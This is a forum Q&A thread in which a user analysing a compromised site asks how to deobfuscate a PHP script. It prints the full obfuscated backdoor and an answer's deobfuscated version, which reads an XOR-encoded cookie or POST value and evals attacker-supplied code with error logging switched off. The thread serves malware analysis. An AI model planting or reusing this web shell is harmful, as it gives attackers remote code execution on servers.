Home / Questions / 33650
Accepted
Juan Pinzón
Asked: 2020-11-15 06:45:41 +0800 CST 2020-11-15 06:45:41 +0800 CST

Deobfuscate php code

  • 772

I was analyzing some compromised PHP files and came across some obfuscated scripts, here is one of these:

<?php
$i9c4 = 487;
$GLOBALS['a1c573'] = Array();
global $a1c573;
$a1c573 = $GLOBALS;
$ {
    "\x47\x4c\x4fB\x41\x4c\x53"
}

['p0279'] = "\x74\x4b\x2a\x4a\x26\x21\xa\x64\x6b\x61\x2e\xd\x3f\x3d\x73\x3c\x65\x2b\x9\x2d\x6a\x55\x24\x6f\x44\x5f\x79\x5a\x7d\x33\x46\x32\x50\x54\x63\x2c\x7c\x77\x75\x7a\x30\x27\x62\x52\x22\x4d\x39\x58\x41\x6c\x5c\x53\x76\x68\x20\x60\x57\x59\x6d\x5b\x66\x43\x23\x40\x7b\x3b\x4c\x2f\x49\x78\x29\x45\x5e\x28\x3a\x56\x70\x67\x69\x34\x38\x42\x31\x6e\x72\x25\x5d\x47\x7e\x51\x36\x4f\x35\x48\x3e\x4e\x37\x71";
$a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]] = $a1c573['p0279'][34] . $a1c573['p0279'][53] . $a1c573['p0279'][84];
$a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]] = $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][7];
$a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]] = $a1c573['p0279'][14] . $a1c573['p0279'][0] . $a1c573['p0279'][84] . $a1c573['p0279'][49] . $a1c573['p0279'][16] . $a1c573['p0279'][83];
$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]] = $a1c573['p0279'][78] . $a1c573['p0279'][83] . $a1c573['p0279'][78] . $a1c573['p0279'][25] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][0];
$a1c573[$a1c573['p0279'][42] . $a1c573['p0279'][79] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][46] . $a1c573['p0279'][7] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] = $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][78] . $a1c573['p0279'][9] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][39] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][80] . $a1c573['p0279'][34] . $a1c573['p0279'][92] . $a1c573['p0279'][42] . $a1c573['p0279'][16]] = $a1c573['p0279'][76] . $a1c573['p0279'][53] . $a1c573['p0279'][76] . $a1c573['p0279'][52] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][14] . $a1c573['p0279'][78] . $a1c573['p0279'][23] . $a1c573['p0279'][83];
$a1c573[$a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][34]] = $a1c573['p0279'][38] . $a1c573['p0279'][83] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][78] . $a1c573['p0279'][9] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][39] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][34]] = $a1c573['p0279'][42] . $a1c573['p0279'][9] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][90] . $a1c573['p0279'][79] . $a1c573['p0279'][25] . $a1c573['p0279'][7] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][23] . $a1c573['p0279'][7] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][16] . $a1c573['p0279'][40] . $a1c573['p0279'][90]] = $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][0] . $a1c573['p0279'][25] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][16] . $a1c573['p0279'][25] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][78] . $a1c573['p0279'][0];
$a1c573[$a1c573['p0279'][76] . $a1c573['p0279'][90] . $a1c573['p0279'][7] . $a1c573['p0279'][31] . $a1c573['p0279'][34] . $a1c573['p0279'][29] . $a1c573['p0279'][34] . $a1c573['p0279'][79]] = $a1c573['p0279'][8] . $a1c573['p0279'][9] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][96] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92];
$a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]] = $a1c573['p0279'][77] . $a1c573['p0279'][82] . $a1c573['p0279'][82] . $a1c573['p0279'][96] . $a1c573['p0279'][29];
$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][92] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] = $_POST;
$a1c573[$a1c573['p0279'][53] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][92] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][46] . $a1c573['p0279'][46]] = $_COOKIE;
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][84] . $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][25] . $a1c573['p0279'][49] . $a1c573['p0279'][23] . $a1c573['p0279'][77], NULL);
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][49] . $a1c573['p0279'][23] . $a1c573['p0279'][77] . $a1c573['p0279'][25] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][84] . $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][14], 0);
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][69] . $a1c573['p0279'][25] . $a1c573['p0279'][16] . $a1c573['p0279'][69] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][38] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][23] . $a1c573['p0279'][83] . $a1c573['p0279'][25] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][16], 0);
@$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][16] . $a1c573['p0279'][40] . $a1c573['p0279'][90]](0);
$n68b9ce = NULL;
$r8fa539 = NULL;
$a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][31] . $a1c573['p0279'][96] . $a1c573['p0279'][40] . $a1c573['p0279'][29] . $a1c573['p0279'][9] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][9]] = $a1c573['p0279'][16] . $a1c573['p0279'][82] . $a1c573['p0279'][16] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][19] . $a1c573['p0279'][82] . $a1c573['p0279'][34] . $a1c573['p0279'][90] . $a1c573['p0279'][60] . $a1c573['p0279'][19] . $a1c573['p0279'][79] . $a1c573['p0279'][92] . $a1c573['p0279'][46] . $a1c573['p0279'][29] . $a1c573['p0279'][19] . $a1c573['p0279'][9] . $a1c573['p0279'][40] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][19] . $a1c573['p0279'][46] . $a1c573['p0279'][40] . $a1c573['p0279'][29] . $a1c573['p0279'][82] . $a1c573['p0279'][80] . $a1c573['p0279'][7] . $a1c573['p0279'][40] . $a1c573['p0279'][34] . $a1c573['p0279'][90] . $a1c573['p0279'][92] . $a1c573['p0279'][92] . $a1c573['p0279'][90];
global $t2703af9a;

function g1173($n68b9ce, $me55b842b)
{
    global $a1c573;
    $e538b = "";
    for ($sa5c67645 = 0; $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce);) {
        for ($xf042d3f = 0; $xf042d3f < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($me55b842b) && $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce); $xf042d3f++, $sa5c67645++) {
            $e538b.= $a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]]($a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($n68b9ce[$sa5c67645]) ^ $a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($me55b842b[$xf042d3f]));
        }
    }

    return $e538b;
}

function ka9e97e75($n68b9ce, $me55b842b)
{
    global $a1c573;
    global $t2703af9a;
    return $a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]]($a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]]($n68b9ce, $t2703af9a) , $me55b842b);
}

foreach($a1c573[$a1c573['p0279'][53] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][92] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][46] . $a1c573['p0279'][46]] as $me55b842b => $s51f5) {
    $n68b9ce = $s51f5;
    $r8fa539 = $me55b842b;
}

if (!$n68b9ce) {
    foreach($a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][92] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] as $me55b842b => $s51f5) {
        $n68b9ce = $s51f5;
        $r8fa539 = $me55b842b;
    }
}

$n68b9ce = @$a1c573[$a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][34]]($a1c573[$a1c573['p0279'][76] . $a1c573['p0279'][90] . $a1c573['p0279'][7] . $a1c573['p0279'][31] . $a1c573['p0279'][34] . $a1c573['p0279'][29] . $a1c573['p0279'][34] . $a1c573['p0279'][79]]($a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][34]]($n68b9ce) , $r8fa539));

if (isset($n68b9ce[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) && $t2703af9a == $n68b9ce[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) {
    if ($n68b9ce[$a1c573['p0279'][9]] == $a1c573['p0279'][78]) {
        $sa5c67645 = Array(
            $a1c573['p0279'][76] . $a1c573['p0279'][52] => @$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][80] . $a1c573['p0279'][34] . $a1c573['p0279'][92] . $a1c573['p0279'][42] . $a1c573['p0279'][16]]() ,
            $a1c573['p0279'][14] . $a1c573['p0279'][52] => $a1c573['p0279'][82] . $a1c573['p0279'][10] . $a1c573['p0279'][40] . $a1c573['p0279'][19] . $a1c573['p0279'][82],
        );
        echo @$a1c573[$a1c573['p0279'][42] . $a1c573['p0279'][79] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][46] . $a1c573['p0279'][7] . $a1c573['p0279'][34] . $a1c573['p0279'][42]]($sa5c67645);
    }
    elseif ($n68b9ce[$a1c573['p0279'][9]] == $a1c573['p0279'][16]) {
        eval /*qc7b4*/
        ($n68b9ce[$a1c573['p0279'][7]]);
    }

    exit();
} 
?>

To understand these scripts a little better I made one print_rof the variable $GLOBALSobtaining the following:

Array
(
    [_GET] => Array
        (
        )

    [_POST] => Array
        (
        )

    [_COOKIE] => Array
        (
        )

    [_FILES] => Array
        (
        )

    [GLOBALS] => Array
 *RECURSION*
    [i9c4] => 487
    [a1c573] => Array
 *RECURSION*
    [p0279] => tK*J&!
dka.
?=s<e+  -jU$oD_yZ}3F2PTc,|wuz0'bR"M9XAl\Svh `WYm[fC#@{;L/Ix)E^(:Vpgi48B1nr%]G~Q6O5H>N7q
    [rbe75] => chr
    [g6725] => ord
    [a24153d81] => strlen
    [u1fdc] => ini_set
    [b4729dcb] => serialize
    [u7338c5be] => phpversion
    [ma7c] => unserialize
    [ta5ac] => base64_decode
    [f673ece06] => set_time_limit
    [p6d2c3c4] => ka9e97e75
    [kf9e4b] => g1173
    [f5cb] => Array
        (
        )

    [ha750e999] => Array
        (
        )

    [n68b9ce] => 
    [r8fa539] => 
    [t2703af9a] => e1e335a5-1c6f-4593-a00e-90318d0c6556
)

Based on this my question is:

Is there a way to deobfuscate this code to make it more understandable? Or can something be done to know how it works?

php

3 Answers

  1. Most of the obfuscated scripts in PHP can be deobfuscated using 4 methods, there may be more but these I have found so far, before going to the mentioned methods, I will put some tools that can be useful to carry out this task.

    Common tools to deobfuscate PHP code

    1. UnPHP . This tool greatly helps deobfuscation of scripts that contain excess functions. In many cases, this site, and others like it, should be visited first to understand the obfuscated code a little better. However, in some cases UnPHP will not be able to deobfuscate the initial code. In these cases, it will be necessary to use other tools to be able to deobfuscate the script.
    2. PHP Beautifier . This is an excellent tool for formatting unreadable code into a single line, so the code will be indented and easier to read.
    3. Base64 decoders . In this case the link is a google search, since there is a variety of this type of tools that can be used online, or running them on our machine by installing them locally.
    4. PHP Sandbox . This tool is very useful for running obfuscated scripts, since they can be some kind of malware or make remote connections, so it is not recommended to run code on your own server. There are more tools like this that can be searched on google, you can use the one you like the most.

    Common Obfuscation Methods

    There are different methods in which hackers or programmers obfuscate their code, here are some common techniques to do it, and in this way understand a little better how to perform the reverse task.

    1. ASCII Encoding . You can look up the hexadecimal number in the link list. In PHP, these hex codes can be represented by a backslash x followed by a number or letter .

      Examples:

      \x48 = H
\x34 = 4
\x78 = x

    However, these characters are not necessarily represented only with \x, it can also be used \#safely.

    1. Unicode strings . Similar to the previous form, but used \u#instead of \x#.

      Examples:

      \u004D = M
\u0065 = e
\u0020 =  (space)
\u0070 = p
\u006c = l
\u0073\ = s

    2. Base64 encoding . Base64 is a bit different than the obfuscation methods mentioned above, but it is still relatively easy to decode.

      Example strings:

       SSBsaWtlIGRvbnV0cw== = I like donuts

 ZXZhbChiYXNlNjRfZGVjb2RlKCJoYXgiKSk7 = eval(base64_decode("hax"));

 QXNzdW1pbmcgZGlyZWN0IGNvbnRyb2w= = Assuming direct control

    3. Garbage stored in a string , i.e. a string separated by for loops, while loops, regex expressions, etc. These need to be manually decoded by oneself, as they vary considerably. Fortunately, the above methods can better help deobfuscate these types of strings.

    Deobfuscating variable names

    If it is not possible to deobfuscate the variable names via the previously mentioned methods, then deobfuscating them must be done manually, which is a very time consuming process. As mentioned in @Eferion's answer

    Fortunately, looking for common malware patterns like turning off log files, using the eval() function, or preg_replace() with obfuscation indicates that something is wrong.

    Obfuscation is the wrong approach, if obfuscated code is found in a compromised website file, it should be assumed that the site has been hacked. Our own code should not be obfuscated.

    Security at the expense of usability is not security.

    Risks of Deobfuscation

    Trying to decrypt these files on our own web server is not secure for many reasons, some of which may be unknown to us. You should not attempt to deobfuscate PHP files on your own web server. Because you could inadvertently introduce additional backdoors, or help the malware spread itself because many of the scripts load functions remotely.

    Deobfuscated Code

    After following the aforementioned methods, I was able to get the following deobfuscated code:

    <?php
$i9c4 = 487;
$GLOBALS['a1c573'] = Array();
global $a1c573;
$a1c573 = $GLOBALS;

$ {
    "GLOBALS"
}

['p0279'] = 'tK*J&!dka.?=s<e+  -jU$oD_yZ}3F2PTc,|wuz0\'bR"M9XAl\Svh `WYm[fC#@{;L/Ix)E^(:Vpgi48B1nr%]G~Q6O5H>N7q';
$a1c573['rbe75'] = chr;
$a1c573['g6725'] = ord;
$a1c573['a24153d81'] = strlen;
$a1c573['u1fdc'] = ini_set;
$a1c573['b4729dcb'] = serialize;
$a1c573['u7338c5be'] = phpversion;
$a1c573['ma7c'] = unserialize;
$a1c573['ta5ac'] = base64_decode;
$a1c573['f673ece06'] = set_time_limit;
$a1c573['p6d2c3c4'] = ka9e97e75;
$a1c573['kf9e4b'] = g1173;
$a1c573['f5cb'] = $_POST;
$a1c573['ha750e999'] = $_COOKIE;
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
$parametro_1 = NULL;
$r8fa539 = NULL;
$a1c573['t2703af9a'] = 'e1e335a5-1c6f-4593-a00e-90318d0c6556';
global $t2703af9a;

function g1173($parametro_1, $parametro_2)
{
    global $a1c573;
    $retorno = "";
    for ($i = 0; $i < strlen($parametro_1);) {
        for ($j = 0; $j < strlen($parametro_2) && $i < strlen($parametro_1); $j++, $i++) {
            $retorno.= chr(ord($parametro_1[$i]) ^ ord($parametro_2[$j]));
        }
    }

    return $retorno;
}

function ka9e97e75($parametro_1, $parametro_2)
{
    global $a1c573;
    global $t2703af9a;
    return g1173(g1173($parametro_1, $t2703af9a) , $parametro_2);
}

foreach($_COOKIE as $parametro_2 => $s51f5) {
    $parametro_1 = $s51f5;
    $r8fa539 = $parametro_2;
}

if (!$parametro_1) {
    foreach($_POST as $parametro_2 => $s51f5) {
        $parametro_1 = $s51f5;
        $r8fa539 = $parametro_2;
    }
}

$parametro_1 = @unserialize(ka9e97e75(base64_decode($parametro_1) , $r8fa539));

if (isset($parametro_1[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) && $t2703af9a == $parametro_1[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) {
    if ($parametro_1[$a1c573['p0279'][9]] == $a1c573['p0279'][78]) {
        $i = Array(
            $a1c573['p0279'][76] . $a1c573['p0279'][52] => @phpversion() ,
            $a1c573['p0279'][14] . $a1c573['p0279'][52] => $a1c573['p0279'][82] . $a1c573['p0279'][10] . $a1c573['p0279'][40] . $a1c573['p0279'][19] . $a1c573['p0279'][82],
        );
        echo @serialize($i);
    }
    elseif ($parametro_1[$a1c573['p0279'][9]] == $a1c573['p0279'][16]) {
        eval /*qc7b4*/
        ($parametro_1[$a1c573['p0279'][7]]);
    }

    exit();
}
?>

    Esta respuesta esta basada en información encontrada en la comunidad:

    Information Security de Stack Exchange

    • 13
  2. Best Answer
    $a1c573 = $GLOBALS;

    Note that $a1c573it is used in almost all the code. Until the next line, the only thing that is done is to initialize the array of $GOBALS:

    global $t2703af9a;

    If you make a small script that prints the content of $aqc573['p0279']in such a way that it indicates the position of each element, the associated character and the entire correspondence of said value (just in case). Something like that:

    0: t 116
1: K 75
2: * 42
3: J 74
4: & 38
5: ! 33
6:   10
7: d 100
8: k 107
9: a 97
10: . 46
11:   13
12: ? 63
13: = 61
...

    And now if, for example, you take the first function:

    function g1173($n68b9ce, $me55b842b)
{
    global $a1c573;
    $e538b = "";
    for ($sa5c67645 = 0; $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce);) {
        for ($xf042d3f = 0; $xf042d3f < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($me55b842b) && $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce); $xf042d3f++, $sa5c67645++) {
            $e538b.= $a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]]($a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($n68b9ce[$sa5c67645]) ^ $a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($me55b842b[$xf042d3f]));
        }
    }

    return $e538b;
}

    Substitute $sa5c67645for $i, $n68b9cefor $param1and $me55b842bfor $param2.

    If we focus on the if, the condition now refers to:

    $i < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce)

    We translate the references to p0279and we are left with:

    $i < $a1c573["a24103d81"]($param1)

    If we look at $GLOBALSthe content of the position a24103d81we see that it corresponds to the command strlen, then the loop looks like this:

    for ($i = 0; $i < strlen($param1); )

    We do the same for the second loop and its content. Finally the function looks like this:

    function g1173($param1, $param2)
{
  global $a1c573;
  $toReturn = "";
  for ($i = 0; $i < strlen($param1); ) {
    for ($j = 0; $j < strlen($param2) && $i < strlen($param1); $j++, $i++) {
      $toReturn.= chr(ord($param1[$i]) ^ ord($param2[$j]));
    }
  }

  return $toReturn;
}

    And the rest is more of the same, you can just make a script that performs some first translations of $a1c573['p0279']in its corresponding character for is by breaking down the code.

    • 8

  3. There are programs like dezender (DeZender / De-ionCube) online, try one. Basically you need a php code deobfuscator

    • 0